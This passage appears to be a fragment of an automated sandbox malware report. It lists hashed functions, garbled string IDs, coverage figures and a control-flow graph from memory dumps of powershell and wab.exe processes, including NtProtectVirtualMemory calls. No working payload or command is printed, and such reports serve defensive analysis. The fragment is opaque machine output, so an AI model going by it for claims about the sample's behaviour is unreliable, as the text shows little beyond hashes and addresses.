                                                                            • Instruction Fuzzy Hash: 8E126EB4A00205DFDB14CB98C695E6ABBB2EF84304F14C459D91A6F396C772EC46CF91
                                                                            Function 0760E4C4 Relevance: .2, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9cab738de02db878780ced36ea7e0c71eaf08f40e8159263b9c07b37f0ca36e2
                                                                            • Instruction ID: cd3d34cbaa874607f346b8f52c1e135f8d71f2e6dbe31c4700dc143bc34b766a
                                                                            • Opcode Fuzzy Hash: 9cab738de02db878780ced36ea7e0c71eaf08f40e8159263b9c07b37f0ca36e2
                                                                            • Instruction Fuzzy Hash: C58171B8A00215DFDB18DF64C594A9ABBF2EF88314F15C959D9056B391C733EC42CBA1
                                                                            Function 0760E4D8 Relevance: .2, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff760e8dcf056d6ac3f5667faa35f3a9d303fc861f675d102a136369b625788c
                                                                            • Instruction ID: 0ee4c753fa2b6b01c49a3b724f250bf694eaa8e10541c783944f4039383177dd
                                                                            • Opcode Fuzzy Hash: ff760e8dcf056d6ac3f5667faa35f3a9d303fc861f675d102a136369b625788c
                                                                            • Instruction Fuzzy Hash: 24815EB8A00215DFDB18DF64C594A9AB7B2EF88314F15C859D9066B391C733EC42CBA1
                                                                            Function 0760D067 Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e568c127663e55393edf3f33836077df34c421ef5c95ab2329253753667afb0a
                                                                            • Instruction ID: 21ef81f7624df926f0da2fe30e8334422892196b38718843109738b2ba0423ce
                                                                            • Opcode Fuzzy Hash: e568c127663e55393edf3f33836077df34c421ef5c95ab2329253753667afb0a
                                                                            • Instruction Fuzzy Hash: 4121B0B4640215CFDB148FA0C940BEE7B72EF42304F1085A5D90A6B391CB769E82CFD1
                                                                            Function 0760D02B Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a95ec5bfb6eb63cac5690e313bb0bf95ed33400a74342e2e73249e61cf6b05bd
                                                                            • Instruction ID: 4b6631737d248287df4089e67717115d3666674ed264d16a99b6cdc5bd6b3e7b
                                                                            • Opcode Fuzzy Hash: a95ec5bfb6eb63cac5690e313bb0bf95ed33400a74342e2e73249e61cf6b05bd
                                                                            • Instruction Fuzzy Hash: F611C0B4640215DFD7148BA0CA81BEEB776EF41308F1080A5D90A6B781CB76AA86CFC1

                                                                            Non-executed Functions

                                                                            Function 0760F938 Relevance: 14.2, Strings: 11, Instructions: 482COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$ul$ul$ul$ul
                                                                            • API String ID: 0-3887445572
                                                                            • Opcode ID: 284ad3126c329fba44eb62ad375418d34aadbfbb2f8936bb80bc90d51897bef8
                                                                            • Instruction ID: 77d911fafd77449fe35de64cec54f582605a00a2facbc77ecddf7a9b8284a182
                                                                            • Opcode Fuzzy Hash: 284ad3126c329fba44eb62ad375418d34aadbfbb2f8936bb80bc90d51897bef8
                                                                            • Instruction Fuzzy Hash: F8F159B27042069FCB388A7895516EBBBE6EFC5310F14846AD816CB391DB31DD46CBE1
                                                                            Function 0760DBB8 Relevance: 14.2, Strings: 11, Instructions: 449COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Tok$4']q$4']q$4']q$4']q$4']q$4']q$DUok$$]q$$]q$$]q
                                                                            • API String ID: 0-1964947218
                                                                            • Opcode ID: ea0be65a7559ff4582616ae8e7b47166daf3ed527f501b9cd0aef420e9b3a26b
                                                                            • Instruction ID: e067b6495cd0f8c3deadf3a905a2e8f65c5281b5075bdae4663fec831ce84f89
                                                                            • Opcode Fuzzy Hash: ea0be65a7559ff4582616ae8e7b47166daf3ed527f501b9cd0aef420e9b3a26b
                                                                            • Instruction Fuzzy Hash: B2E103B1B042058FCB1C9F78D5446ABBBA6AF86310F14C5AAD8178B3D5DB31D846CBE1
                                                                            Function 076018C8 Relevance: 12.8, Strings: 10, Instructions: 311COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2309685269
                                                                            • Opcode ID: 24e3ab8a093a3ec06290da76d1f75ecbcefccc3b505a10ddc1c7864eb2e8f399
                                                                            • Instruction ID: da2c8a31d69b23ea9be1985752756adff588980b334e442e36e8257f117843f6
                                                                            • Opcode Fuzzy Hash: 24e3ab8a093a3ec06290da76d1f75ecbcefccc3b505a10ddc1c7864eb2e8f399
                                                                            • Instruction Fuzzy Hash: A5A135B1B002099FCB2C8A79C54066FBBE7EF86710F14846AD8569B385DB35DD42CBE1
                                                                            Function 07602128 Relevance: 12.8, Strings: 10, Instructions: 304COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-267665775
                                                                            • Opcode ID: e13c29fc9717c570a8bec6b3b799ff937831767932cf71669b8c8ab909277095
                                                                            • Instruction ID: 1ee00676d27452a2219383d41f88d7a66322aeda846c1fced2cc6c33ae8c057d
                                                                            • Opcode Fuzzy Hash: e13c29fc9717c570a8bec6b3b799ff937831767932cf71669b8c8ab909277095
                                                                            • Instruction Fuzzy Hash: 97A147B17143069FCB2D4A78D9A866B7BE5BF81610F1484BAD946CB3D1DB31C886C3E1
                                                                            Function 0760EA60 Relevance: 10.3, Strings: 8, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$84}l$84}l$tP]q$tP]q$tP]q$tP]q
                                                                            • API String ID: 0-819032969
                                                                            • Opcode ID: 791ff27e0cd93835b7c385d1130361b34c1abe762e537fd85143032bd8190f95
                                                                            • Instruction ID: c8094db0cea8ee96e431cc8da77d1645cd0662070f34030f101018d7e271c9b1
                                                                            • Opcode Fuzzy Hash: 791ff27e0cd93835b7c385d1130361b34c1abe762e537fd85143032bd8190f95
                                                                            • Instruction Fuzzy Hash: 7CA109707402259FD719AF68C944A6BBBF2EF89310F198869D9165B3D0DB32EC41CBE1
                                                                            Function 0760B2EE Relevance: 10.3, Strings: 8, Instructions: 292COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-3967578428
                                                                            • Opcode ID: c70f135083332509e0b7394672400ada425e987cf605363a10f396437120463c
                                                                            • Instruction ID: e0688c6590fdd31d793721b210c99e0508c1a9d19127fe3c3935f6a681d755d5
                                                                            • Opcode Fuzzy Hash: c70f135083332509e0b7394672400ada425e987cf605363a10f396437120463c
                                                                            • Instruction Fuzzy Hash: 2FD11CB4A04218CFDB68DF24C994BEAB7B6EF84304F1085D5D5096B395CB31AE86CF91
                                                                            Function 076097B4 Relevance: 10.2, Strings: 8, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$84}l$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3678008071
                                                                            • Opcode ID: 6f9ce6989ff6820e29241410621ff182f5d331b28687cb4f1fbfd04b98510edb
                                                                            • Instruction ID: 3dbdc8ba3235fcb2e63f5333218e1da341f8081aa29cf7a0ef9952cfde2fa279
                                                                            • Opcode Fuzzy Hash: 6f9ce6989ff6820e29241410621ff182f5d331b28687cb4f1fbfd04b98510edb
                                                                            • Instruction Fuzzy Hash: 3351B9F0600306DBCB2C8E25C544AA7B3A3BB45321F188866E8579B3D2C731EC81CBE1
                                                                            Function 07608998 Relevance: 7.7, Strings: 6, Instructions: 207COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-1480752206
                                                                            • Opcode ID: 5479e5571fd5c9b0a8fcdca1efeacd00f11484fb825556488df2c68edb19affb
                                                                            • Instruction ID: 959f3c268f0bdb169172b5e9efc3e37f5bcc92c30958df787b91f1636749bfd2
                                                                            • Opcode Fuzzy Hash: 5479e5571fd5c9b0a8fcdca1efeacd00f11484fb825556488df2c68edb19affb
                                                                            • Instruction Fuzzy Hash: 1B61F3B170420BDFCB2CCE39D44066BBBA5AF81220F14C46AD8468BB91DB35DC52CBE0
                                                                            Function 0760A1D0 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$84}l$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-498122519
                                                                            • Opcode ID: 094ad7426b248f7b96db00ce5d30a948304bdffd705aac6eecc1f83f30379f7a
                                                                            • Instruction ID: 0c6ade1732060223c6473496596f7f37c1260a9554d375afbfcb2007e752b4db
                                                                            • Opcode Fuzzy Hash: 094ad7426b248f7b96db00ce5d30a948304bdffd705aac6eecc1f83f30379f7a
                                                                            • Instruction Fuzzy Hash: 9E619DF4610306DBDB2C8EA4C544BBB77A2AB45391F18C065E802AB2D0CB35DD85CBE1
                                                                            Function 0760C64A Relevance: 6.5, Strings: 5, Instructions: 222COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-86929144
                                                                            • Opcode ID: 3c0f463f0d88226662e6c2d4670f40fb1019edaad8aa37bcc03469db65e001e8
                                                                            • Instruction ID: bc315e6cefcc25cda973a5bb281442f96adcc226b8351bf4fe6944ff25e9a66b
                                                                            • Opcode Fuzzy Hash: 3c0f463f0d88226662e6c2d4670f40fb1019edaad8aa37bcc03469db65e001e8
                                                                            • Instruction Fuzzy Hash: 1AA16EB4A00218CFDB58DF24C990BEEB7B6EB45304F1085D5D5096B785CB31AE82CFA0
                                                                            Function 0760D3A0 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4|l$4|l$tLqk
                                                                            • API String ID: 0-1044231163
                                                                            • Opcode ID: f7bb249e50446d619ecc3a4ab08eedc411f70c91338b01b535a4a3024eef7c54
                                                                            • Instruction ID: 25ed24d2522b8dc7c150a40e848f63d37528ba63a04a3ae0d9c264e54d90b658
                                                                            • Opcode Fuzzy Hash: f7bb249e50446d619ecc3a4ab08eedc411f70c91338b01b535a4a3024eef7c54
                                                                            • Instruction Fuzzy Hash: 5761D7B4B102059FD718DFA8C590A6BBBE7EF84314F148569D816AB394CB31EC46CBD2
                                                                            Function 076018A7 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2702571027
                                                                            • Opcode ID: 3fc2a8e0655de70d15360077610816abb5518bdce224acfaf9551283cedbb6ef
                                                                            • Instruction ID: 5a3d2fd4103b9d6e4c589d2be55de3b96e50a9ceb82fab894965cfcb18bc9bdf
                                                                            • Opcode Fuzzy Hash: 3fc2a8e0655de70d15360077610816abb5518bdce224acfaf9551283cedbb6ef
                                                                            • Instruction Fuzzy Hash: AE41E2B0A042099FDB2D8E65C5807AF7BB2AF47710F1881A6D8569B6D1D731CD42CBD1
                                                                            Function 0760E358 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-444294576
                                                                            • Opcode ID: 1f0f7f582c1b7a7b30bc1e9e2d957b8129ee142fcc57cfce891c82697ee03ba8
                                                                            • Instruction ID: d7bee5bedb670b6e9794f14ccdef52364ec99a48bbbdf2637c546eaed2a9c0d2
                                                                            • Opcode Fuzzy Hash: 1f0f7f582c1b7a7b30bc1e9e2d957b8129ee142fcc57cfce891c82697ee03ba8
                                                                            • Instruction Fuzzy Hash: DA21B2B6600226DFDB2CAE79C58096BBBF4EF40A10F154C66D9029B391C732ED04C7A2
                                                                            Function 076000F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$ul$ul
                                                                            • API String ID: 0-2757999759
                                                                            • Opcode ID: b111581b55a9a0d0b7b82b4bf5b9897bb30c518958962f578e86f0264b6e1e1e
                                                                            • Instruction ID: f64012c21656019d7a30aa041bfe86f5b4963afbf37e40f475ae321e683f263c
                                                                            • Opcode Fuzzy Hash: b111581b55a9a0d0b7b82b4bf5b9897bb30c518958962f578e86f0264b6e1e1e
                                                                            • Instruction Fuzzy Hash: 571129753043069BDB2D49BE9800B27B7AABBC1761F2484AAE84A873D1E975C445C3D0
                                                                            Function 07608C50 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$(o]q$(o]q$(o]q
                                                                            • API String ID: 0-1261621458
                                                                            • Opcode ID: 9f6e7a302ccf72e4af13ee4acf9efbbe31f042c45ebe6c2d01e7a5eef3914f66
                                                                            • Instruction ID: 9d50ce865e7765cf803913a78a2df27a94dc491a7f688622e1163397b9c0bd72
                                                                            • Opcode Fuzzy Hash: 9f6e7a302ccf72e4af13ee4acf9efbbe31f042c45ebe6c2d01e7a5eef3914f66
                                                                            • Instruction Fuzzy Hash: 8BF115B1704306DFDB198F78D8547AB7BA2EF85310F14846AE5168B3D2DB31E846CBA1
                                                                            Function 0760EA54 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$tP]q$tP]q
                                                                            • API String ID: 0-1669528957
                                                                            • Opcode ID: 65a1e89f8be7591ebe1fba317661c2c430156327b45a9f1fe7a9e252d45f66a2
                                                                            • Instruction ID: a7016e3ee88d8fa1b1eaa9bddfa0f481b9280f1435f07cec9b180765725eee53
                                                                            • Opcode Fuzzy Hash: 65a1e89f8be7591ebe1fba317661c2c430156327b45a9f1fe7a9e252d45f66a2
                                                                            • Instruction Fuzzy Hash: 3551A0B0A00225DBDB2CEE68C544A6BB7F2FF89614F198959D8166B3D0D772EC41CBD0
                                                                            Function 076030D8 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$tP]q$tP]q
                                                                            • API String ID: 0-1669528957
                                                                            • Opcode ID: c904c9c5515d4b08dbca15a7968d30ca46c3ccc82e236662d4aabea7aa60f336
                                                                            • Instruction ID: 18185382b66bc1791f9e34583972519e9ee643baa431fa3bd660d9079e109ca6
                                                                            • Opcode Fuzzy Hash: c904c9c5515d4b08dbca15a7968d30ca46c3ccc82e236662d4aabea7aa60f336
                                                                            • Instruction Fuzzy Hash: 314179B1604355AFC7194A7A8850667BFF6EF85712F1488AEE4459F381C631DD05C3E1
                                                                            Function 07600CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 6f319921016222d3a82f78ce6dfc17ba063bff2d4c17964ec427ca54bcee23bd
                                                                            • Instruction ID: 0d593c552b3872520e9895c14374ba4a4d4ff18560cc15037539fc0d20df0587
                                                                            • Opcode Fuzzy Hash: 6f319921016222d3a82f78ce6dfc17ba063bff2d4c17964ec427ca54bcee23bd
                                                                            • Instruction Fuzzy Hash: F02129B13543065BD72C197E9950B37B7EA9BC1711F24842AD946CB3C1DD75E84283F1
                                                                            Function 07607F18 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 643062c690c696ff79d6628590ea9ac33b315361309efb157cad8ee5b3fb0c40
                                                                            • Instruction ID: 0d47ca0d7ff11ae70c2c37920bf8a0fe06bda700fc111008dc81b8449acb6385
                                                                            • Opcode Fuzzy Hash: 643062c690c696ff79d6628590ea9ac33b315361309efb157cad8ee5b3fb0c40
                                                                            • Instruction Fuzzy Hash: 8A116DF5A0030B9FDF2C8E698580667B7F5BF91611F18846AD84B87381D731E585CBE2
                                                                            Function 07601749 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q
                                                                            • API String ID: 0-978391646
                                                                            • Opcode ID: 7d4faca9af1b74c4ef8d7f00620f494963c1a2c3dd2a44b754928c4ca34b7531
                                                                            • Instruction ID: d6c21a0b5d232d0c83ec1c04a261d5a96f003fbe82af3dd1de3094e81984f3ee
                                                                            • Opcode Fuzzy Hash: 7d4faca9af1b74c4ef8d7f00620f494963c1a2c3dd2a44b754928c4ca34b7531
                                                                            • Instruction Fuzzy Hash: C001D46070D3894FC32F063C186016A6FB2DF83A5071A09D7D492DB3D7C9588D06C3B6

                                                                            Execution Graph

                                                                            Execution Coverage:15.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:100%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 8859 24c2968 8860 24c29b6 NtProtectVirtualMemory 8859->8860 8862 24c2a00 8860->8862

                                                                            Executed Functions

                                                                            Function 024C2510 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 454nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 138 24c2510-24c2554 139 24c2556-24c2558 138->139 140 24c2560-24c2563 138->140 141 24c28ce-24c28fd 139->141 142 24c255e 139->142 140->141 143 24c2569-24c258c 140->143 159 24c2904-24c2908 141->159 142->143 146 24c258e-24c2590 143->146 147 24c2598-24c259b 143->147 146->141 149 24c2596 146->149 147->141 150 24c25a1-24c25c7 147->150 149->150 153 24c25c9-24c25cd 150->153 154 24c25d5-24c25d9 150->154 153->141 157 24c25d3 153->157 154->141 155 24c25df-24c25ed 154->155 160 24c25fc-24c2604 155->160 161 24c25ef-24c25fa 155->161 157->155 162 24c290a-24c2914 159->162 163 24c2915-24c29fe NtProtectVirtualMemory 159->163 164 24c2607-24c2609 160->164 161->164 191 24c2a07-24c2a2c 163->191 192 24c2a00-24c2a06 163->192 166 24c260b-24c260d 164->166 167 24c2615-24c2618 164->167 166->141 168 24c2613 166->168 167->141 169 24c261e-24c2641 167->169 168->169 173 24c264d-24c2650 169->173 174 24c2643-24c2645 169->174 173->141 176 24c2656-24c267a 173->176 174->141 175 24c264b 174->175 175->176 179 24c267c-24c267e 176->179 180 24c2686-24c2689 176->180 179->141 182 24c2684 179->182 180->141 183 24c268f-24c26b0 180->183 182->183 186 24c26bc-24c26bf 183->186 187 24c26b2-24c26b4 183->187 186->141 190 24c26c5-24c26e9 186->190 187->141 189 24c26ba 187->189 189->190 196 24c26eb-24c26ed 190->196 197 24c26f5-24c26f8 190->197 192->191 196->141 200 24c26f3 196->200 197->141 198 24c26fe-24c2722 197->198 202 24c272e-24c2731 198->202 203 24c2724-24c2726 198->203 200->198 202->141 205 24c2737-24c275b 202->205 203->141 204 24c272c 203->204 204->205 207 24c275d-24c275f 205->207 208 24c2767-24c276a 205->208 207->141 209 24c2765 207->209 208->141 210 24c2770-24c2783 208->210 209->210 210->159 212 24c2789-24c27b8 210->212 213 24c27ba-24c27bc 212->213 214 24c27c4-24c27c7 212->214 213->141 215 24c27c2 213->215 214->141 216 24c27cd-24c27e5 214->216 215->216 218 24c27e7-24c27e9 216->218 219 24c27f1-24c27f4 216->219 218->141 220 24c27ef 218->220 219->141 221 24c27fa-24c2811 219->221 220->221 224 24c28bd-24c28c6 221->224 225 24c2817-24c283a 221->225 224->212 228 24c28cc 224->228 226 24c283c-24c283e 225->226 227 24c2846-24c2849 225->227 226->141 229 24c2844 226->229 227->141 230 24c284f-24c287f 227->230 228->159 229->230 232 24c2887-24c288a 230->232 233 24c2881-24c2883 230->233 232->141 235 24c288c-24c28a9 232->235 233->141 234 24c2885 233->234 234->235 237 24c28ab-24c28ad 235->237 238 24c28b1-24c28b4 235->238 237->141 239 24c28af 237->239 238->141 240 24c28b6-24c28bb 238->240 239->240 240->159
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID: 4|bq
                                                                            • API String ID: 2706961497-1932486993
                                                                            • Opcode ID: d438a15c1b4998801f9b55907d4e0213cd1de0d79dd78f3ee7cda0243982a365
                                                                            • Instruction ID: dd371a30a684fc67e720184e681a0cc7572edc120c00536230f3cb8d75e8f353
                                                                            • Opcode Fuzzy Hash: d438a15c1b4998801f9b55907d4e0213cd1de0d79dd78f3ee7cda0243982a365
                                                                            • Instruction Fuzzy Hash: 78E1C235F042054BDB54CA7D8C903AE76A36FC4224F78823EE915EB7C4EBF499068761
                                                                            Function 024C2968 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 700 24c2968-24c29fe NtProtectVirtualMemory 703 24c2a07-24c2a2c 700->703 704 24c2a00-24c2a06 700->704 704->703
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
                                                                            Memory Dump Source
